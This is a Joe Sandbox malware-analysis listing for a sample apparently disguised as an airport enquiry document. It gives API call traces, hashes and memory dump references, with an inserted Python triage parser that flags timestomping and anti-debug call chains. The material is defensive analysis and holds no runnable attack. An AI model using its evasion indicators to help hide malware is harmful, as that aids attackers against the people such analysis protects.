            • Instruction Fuzzy Hash: D78198B89093908FCB84EF79E9486557AE4EB8B718314852AD11FC7762EB31C445CF36
            APIs
            • _memset.LIBCMT ref: 00C84401
            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C844A6
            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C844C3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: IconNotifyShell_$_memset
            • String ID:
            • API String ID: 1505330794-0
            • Opcode ID: bf2e28c286e053b1dfae083e9015edd163a8c0bc7f30a245ff9ef5f740ea5935
            • Instruction ID: 95be8202c53e90b6cf4c04b8adcefe5c78ce39d0ee9e2874d47d490ef99fd512
            • Opcode Fuzzy Hash: bf2e28c286e053b1dfae083e9015edd163a8c0bc7f30a245ff9ef5f740ea5935
            • Instruction Fuzzy Hash: CE3164B15057119FD724EF24D88479BBBE4FB49308F00092EF59AC3351D7B5AA44CB5A
            APIs
            • __FF_MSGBANNER.LIBCMT ref: 00CA5963
              • Part of subcall function 00CAA3AB: __NMSG_WRITE.LIBCMT ref: 00CAA3D2
              • Part of subcall function 00CAA3AB: __NMSG_WRITE.LIBCMT ref: 00CAA3DC
            • __NMSG_WRITE.LIBCMT ref: 00CA596A
              • Part of subcall function 00CAA408: GetModuleFileNameW.KERNEL32(00000000,00D443BA,00000104,?,00000001,00000000), ref: 00CAA49A
              • Part of subcall function 00CAA408: ___crtMessageBoxW.LIBCMT ref: 00CAA548
              • Part of subcall function 00CA32DF: ___crtCorExitProcess.LIBCMT ref: 00CA32E5
              • Part of subcall function 00CA32DF: ExitProcess.KERNEL32 ref: 00CA32EE
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            • RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,00CA1013,?), ref: 00CA598F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
            • String ID:
            • API String ID: 1372826849-0
            • Opcode ID: af34b5da43ea6445b210703a6d8e8dee27930ade4fd65dd0140212c31fbd2a09
            • Instruction ID: 8c5127d42f61a43d6d727258e01e64ba1be0910b9413059ef602abf763d07dc7
            • Opcode Fuzzy Hash: af34b5da43ea6445b210703a6d8e8dee27930ade4fd65dd0140212c31fbd2a09
            • Instruction Fuzzy Hash: 1D01D235600B17DFE6212B35E852B6F72588F4377CF10402AF510EE2C1DB709E42A665
            APIs
            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CE97D2,?,?,?,?,?,00000004), ref: 00CE9B45
            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CE9B5B
            • CloseHandle.KERNEL32(00000000,?,00CE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CE9B62
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: File$CloseCreateHandleTime
            • String ID:
            • API String ID: 3397143404-0
            • Opcode ID: 2445cc6a49a86878fca4faae8920bf503396a83e8d0d2f6247a826fb406a07d9
            • Instruction ID: fd8f7bfd6a2db746e50ea83eb1ce403f10812533c8c16b4b513f644a2a0ae31c
            • Opcode Fuzzy Hash: 2445cc6a49a86878fca4faae8920bf503396a83e8d0d2f6247a826fb406a07d9
            • Instruction Fuzzy Hash: 28E08632580314B7D7311B55EC09FCA7B18EB05B71F204120FB28A91E087B1261197A9
            APIs
            • _free.LIBCMT ref: 00CE8FA5
              • Part of subcall function 00CA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00CA9C64), ref: 00CA2FA9
              • Part of subcall function 00CA2F95: GetLastError.KERNEL32(00000000,?,00CA9C64), ref: 00CA2FBB
            • _free.LIBCMT ref: 00CE8FB6
            • _free.LIBCMT ref: 00CE8FC8
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
            • Instruction ID: c94c24bd8feaa1e311fe697fa08c3ffeda2b5477fd127a55d02bda3e739a8d78
            • Opcode Fuzzy Hash: 7ae2d2e3dd28ae231ba4dfbfc9ff98cbdd3434907fe9d12881c55d2a38818b0b
            • Instruction Fuzzy Hash: AFE0C2A13087224ECA20A5FDAD00A8327EE0F48350708080DB41DDB142CE24E940A028
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID: CALL
            • API String ID: 0-4196123274
            • Opcode ID: a613f741453953a7907cda4a6c330a2b12e40e59a485a841ceaa3af3d5a91a57
            • Instruction ID: a7dfb2ce4620c5ea5db82dac6cb71ae6066d9dbf4a26162e2fb98466c366f554
            • Opcode Fuzzy Hash: a613f741453953a7907cda4a6c330a2b12e40e59a485a841ceaa3af3d5a91a57
            • Instruction Fuzzy Hash: BC225974508201CFD724EF14C494B6ABBE1FF45308F29895EE8968B362D731ED81DB86
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove
            • String ID: EA06
            • API String ID: 4104443479-3962188686
            • Opcode ID: 8b0272045b2139b13c403241c4cf42492645820b36737885fe90f48f42f16cb8
            • Instruction ID: 82f17be50732b1a8439e570af999008a45ebcfb0c8555442d7cccb5a67061668
            • Opcode Fuzzy Hash: 8b0272045b2139b13c403241c4cf42492645820b36737885fe90f48f42f16cb8
            • Instruction Fuzzy Hash: 09418F31A046695BCF29BB64C8517BFFFA6AB0130CF284079FC829B182D6718E4497E5
            APIs
            • IsThemeActive.UXTHEME ref: 00C84992
              • Part of subcall function 00CA35AC: __lock.LIBCMT ref: 00CA35B2
              • Part of subcall function 00CA35AC: DecodePointer.KERNEL32(00000001,?,00C849A7,00CD81BC), ref: 00CA35BE
              • Part of subcall function 00CA35AC: EncodePointer.KERNEL32(?,?,00C849A7,00CD81BC), ref: 00CA35C9
              • Part of subcall function 00C84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C84A73
              • Part of subcall function 00C84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C84A88
              • Part of subcall function 00C83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C83B7A
              • Part of subcall function 00C83B4C: IsDebuggerPresent.KERNEL32 ref: 00C83B8C
              • Part of subcall function 00C83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D462F8,00D462E0,?,?), ref: 00C83BFD
              • Part of subcall function 00C83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00C83C81
            • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00C849D2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
            • String ID:
            • API String ID: 1438897964-0
            • Opcode ID: 0dd2fd39e65414d0ecb35d9b77f7ba24f1c136185e7e7bfaea98a8af3ddd0972
            • Instruction ID: 26025ee85e5582dba2661fcf534f50aac5444cbea318e8398a4ea1d6262d9193
            • Opcode Fuzzy Hash: 0dd2fd39e65414d0ecb35d9b77f7ba24f1c136185e7e7bfaea98a8af3ddd0972
            • Instruction Fuzzy Hash: 6211AC71908301ABC700EF68EC8591ABBE8EB96714F00451EF046C33B1DBB09648DBAA
            APIs
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00C85981,?,?,?,?), ref: 00C85E27
            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00C85981,?,?,?,?), ref: 00CBE19C
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 5dceecb61778df78869f700ca9e1cd62f180ad729c97b36ec372906b13faf4e9
            • Instruction ID: 1bc03c113ad2f91f9876bec40130a52e780187d1d4dd537ed298a9e144cbd318
            • Opcode Fuzzy Hash: 5dceecb61778df78869f700ca9e1cd62f180ad729c97b36ec372906b13faf4e9
            • Instruction Fuzzy Hash: 14017970644708BEF7245E24CC86FA6379CEB0576CF108319BAF55A1E0C6F45E498B54
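Added example, not code from the Joe Sandbox report or its IDA plugin: a parser for the per-function API lines in these records that decodes the CreateFileW arguments the sandbox recovered and flags the call chains a triage analyst looks for. It covers three records from this page: the GENERIC_WRITE handle (40000000) followed by SetFileTime and CloseHandle at 00CE9B45..00CE9B62, the IsDebuggerPresent reached from the IsThemeActive routine at 00C84992, and the GENERIC_READ (80000000, OPEN_EXISTING) / GENERIC_READ|GENERIC_WRITE (C0000000, OPEN_ALWAYS) pair at 00C85E27 and 00CBE19C. The sample records are copied from this report; the line grammar, the flag names and the heuristics are the example's own assumptions, not Joe Sandbox identifiers.

```python
"""Added example, not Joe Sandbox code: parse the per-function 'APIs' records of a
Joe Sandbox disassembly listing, decode CreateFileW arguments and flag call chains
worth a second look.  The line grammar and flag names are this example's assumptions."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line, with or without an argument list, optionally prefixed with the
# "Part of subcall function XXXXXXXX:" marker the report uses for callee APIs.
API_LINE = re.compile(
    r"^\s*(?:\u2022\s*)?"
    r"(?:Part of subcall function (?P<subaddr>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_@][\w@:]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 constants for CreateFileW(lpFileName, dwDesiredAccess, dwShareMode,
# lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile).
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# Records copied verbatim from this report (the SetFileTime routine at 00CE9B45,
# the IsThemeActive routine at 00C84992 and the CreateFileW pair at 00C85E27/00CBE19C).
RECORD_SETFILETIME = """\
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00CE97D2,?,?,?,?,?,00000004), ref: 00CE9B45
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00CE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00CE9B5B
• CloseHandle.KERNEL32(00000000,?,00CE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CE9B62
"""
RECORD_THEME = """\
• IsThemeActive.UXTHEME ref: 00C84992
  • Part of subcall function 00CA35AC: __lock.LIBCMT ref: 00CA35B2
  • Part of subcall function 00C83B4C: IsDebuggerPresent.KERNEL32 ref: 00C83B8C
• SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00C849D2
"""
RECORD_CREATEFILE_PAIR = """\
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00C85981,?,?,?,?), ref: 00C85E27
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00C85981,?,?,?,?), ref: 00CBE19C
"""


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str
    args: List[object] = field(default_factory=list)  # int for hex values, None for "?", str otherwise
    subcall_of: Optional[str] = None                  # callee address when nested, else None


def _parse_arg(token: str):
    token = token.strip()
    if token == "?":
        return None           # value not recovered by the sandbox
    try:
        return int(token, 16)
    except ValueError:
        return token          # string literal such as >>>AUTOIT NO CMDEXECUTE<<<


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the 'APIs' section of one function record into ApiCall objects; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), m.group("ref"), args, m.group("subaddr")))
    return calls


def _bits(value, table) -> List[str]:
    return [name for bit, name in table.items() if isinstance(value, int) and value & bit]


def describe_createfile(call: ApiCall) -> dict:
    """Decode dwDesiredAccess, dwShareMode and dwCreationDisposition of one CreateFileW call."""
    if call.api != "CreateFileW" or len(call.args) < 5:
        raise ValueError("not a CreateFileW call with a recovered argument list")
    access, share, disp = call.args[1], call.args[2], call.args[4]
    return {
        "access": _bits(access, GENERIC),
        "share": _bits(share, SHARE),
        "disposition": DISPOSITION.get(disp, "?" if disp is None else str(disp)),
    }


def flag_chains(calls: List[ApiCall]) -> List[str]:
    """Heuristic flags for one function record (flag names are this example's own)."""
    flags = []
    direct = [c for c in calls if c.subcall_of is None]   # the function's own calls, in address order
    names = [c.api for c in direct]
    for i, c in enumerate(direct):
        if (c.api == "CreateFileW" and len(c.args) >= 5
                and "GENERIC_WRITE" in describe_createfile(c)["access"]
                and "SetFileTime" in names[i + 1:]):
            flags.append("file-timestamp-write")           # write handle, then SetFileTime
    if any(c.api == "IsDebuggerPresent" for c in calls):   # nested callees count too
        flags.append("anti-debug-check")
    if any(c.api.startswith("LoadLibrary") for c in calls):
        flags.append("runtime-library-load")
    return flags


if __name__ == "__main__":
    for name, rec in (("SetFileTime", RECORD_SETFILETIME), ("IsThemeActive", RECORD_THEME),
                      ("CreateFileW pair", RECORD_CREATEFILE_PAIR)):
        calls = parse_api_lines(rec)
        print(name, flag_chains(calls),
              [describe_createfile(c) for c in calls if c.api == "CreateFileW"])
```

The flags are only a pointer, not a verdict: a write handle followed by SetFileTime is consistent with the AutoIt runtime's FileSetTime, which the report's "compiled AutoIt script" signature makes the likely origin, and the same primitive is what timestomping uses, so the caller still has to look at the path argument (recovered here only as "?") before reading anything into it. Subcall lines are kept but marked with their callee address, so IsDebuggerPresent is attributed to 00C83B4C rather than to the IsThemeActive routine that happens to reach it.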
            APIs
              • Part of subcall function 00CA594C: __FF_MSGBANNER.LIBCMT ref: 00CA5963
              • Part of subcall function 00CA594C: __NMSG_WRITE.LIBCMT ref: 00CA596A
              • Part of subcall function 00CA594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,00CA1013,?), ref: 00CA598F
            • std::exception::exception.LIBCMT ref: 00CA102C
            • __CxxThrowException@8.LIBCMT ref: 00CA1041
              • Part of subcall function 00CA87DB: RaiseException.KERNEL32(?,?,?,00D3BAF8,00000000,?,?,?,?,00CA1046,?,00D3BAF8,?,00000001), ref: 00CA8830
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
            • String ID:
            • API String ID: 3902256705-0
            • Opcode ID: eced9a2b7bd787b72abf01f63608a3d235632c0ec799f0e56b16bae4d94f92d3
            • Instruction ID: ba96646be28531fecb0638e131bb1c9561284efde65b87f41d3a68e27d8b7bdf
            • Opcode Fuzzy Hash: eced9a2b7bd787b72abf01f63608a3d235632c0ec799f0e56b16bae4d94f92d3
            • Instruction Fuzzy Hash: 01F0A93550025BA7CB21AA58FC159EF77A89F02358F140415FC1495691DFB18BD496E0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __lock_file_memset
            • String ID:
            • API String ID: 26237723-0
            • Opcode ID: cebfdcee8383c7f8159c376b2f0c79d6a1ca6276ce3b8a7188b64b8c15bed91c
            • Instruction ID: 933ca890c120e0ce646e5fd49286d3c7781e2505115028569ebd0fefbf8acd3f
            • Opcode Fuzzy Hash: cebfdcee8383c7f8159c376b2f0c79d6a1ca6276ce3b8a7188b64b8c15bed91c
            • Instruction Fuzzy Hash: C6018471C4060BEFCF22AF698C0559E7B61AF42768F148215F8245A1E1DB358A21EB91
            APIs
              • Part of subcall function 00CA8D68: __getptd_noexit.LIBCMT ref: 00CA8D68
            • __lock_file.LIBCMT ref: 00CA561B
              • Part of subcall function 00CA6E4E: __lock.LIBCMT ref: 00CA6E71
            • __fclose_nolock.LIBCMT ref: 00CA5626
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
            • String ID:
            • API String ID: 2800547568-0
            • Opcode ID: 64df2a234d53bf2d37ff5be9585fdfeb185356b22b3476d50fbca0c21ec0b590
            • Instruction ID: 883022f6b3a51a448737eb66c5b482a402b52bacd808ee12260a7036439a46b4
            • Opcode Fuzzy Hash: 64df2a234d53bf2d37ff5be9585fdfeb185356b22b3476d50fbca0c21ec0b590
            • Instruction Fuzzy Hash: 51F09071800A079BD720AF759C0676E76A16F4333CF55C209F424AB2C1CF7C8A05AB55
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 35f629f0312496d1f5dfa7dee80978be214cb1063116b545b58616b2b5e9eb96
            • Instruction ID: 875596632ec756843be04280bcfa3ed502c0c864ad61c838bbfc229a7bd4b12b
            • Opcode Fuzzy Hash: 35f629f0312496d1f5dfa7dee80978be214cb1063116b545b58616b2b5e9eb96
            • Instruction Fuzzy Hash: F751A034600604AFCF14FB64C995FBE77A5AF45314F148068F956AB382DB30EE01EB55
            APIs
            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00C85CF6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: a029d4694a564c7375a5ac158865afa49e2976c3da61556375b66196af5c9ca6
            • Instruction ID: 3ffa2d19e72080797c24ea864033d478599884cf193fc8737de6e46cbe4816c5
            • Opcode Fuzzy Hash: a029d4694a564c7375a5ac158865afa49e2976c3da61556375b66196af5c9ca6
            • Instruction Fuzzy Hash: 58313C71A00B19AFCB18EF2DC48469DB7B5FF48314F24862AD81993710D7B1AD50DB94
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClearVariant
            • String ID:
            • API String ID: 1473721057-0
            • Opcode ID: 2a3ea1a1a5bb883bd4bec2368364784ad9790cf0564a596b6488b603849f68b3
            • Instruction ID: 6bff8bfd93a4a97fdbcc1fef606ce2161b4018a0b194671d12f3ec66cb3e9495
            • Opcode Fuzzy Hash: 2a3ea1a1a5bb883bd4bec2368364784ad9790cf0564a596b6488b603849f68b3
            • Instruction Fuzzy Hash: FF411574508341CFDB24DF14C484B1ABBE0BF45318F1989ADE8AA8B762C372EC95CB56
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
